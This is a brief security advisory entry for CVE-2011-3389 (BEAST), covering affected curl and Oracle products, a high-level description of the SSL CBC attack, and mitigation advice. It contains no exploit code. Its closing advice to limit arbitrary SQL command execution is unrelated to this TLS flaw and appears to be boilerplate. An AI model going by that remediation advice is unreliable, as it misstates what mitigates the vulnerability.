CVE-2011-3389

Name of the Vulnerable Software and Affected Versions curl versions prior to 7.24.0 Oracle (affected versions not specified)

Description The issue concerns multiple vulnerabilities in the curl package and Oracle products, which can lead to breaches of confidentiality, integrity, and availability of protected information. Exploitation can be done remotely. The SSL protocol, used in certain configurations in various products, including Microsoft Windows, Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and others, is vulnerable to a "BEAST" attack. This attack allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack on an HTTPS session, in conjunction with JavaScript code that uses the HTML5 WebSocket API, Java URLConnection API, or Silverlight WebClient API.

Recommendations For curl versions prior to 7.24.0, update to version 7.24.0 or later to mitigate the risk. For Oracle products, at the moment, there is no information about a newer version that contains a fix for this vulnerability. As a temporary workaround, consider disabling the use of CBC mode with chained initialization vectors in SSL configurations to minimize the risk of exploitation. Restrict access to sensitive data and limit the execution of arbitrary SQL commands to reduce the impact of potential attacks.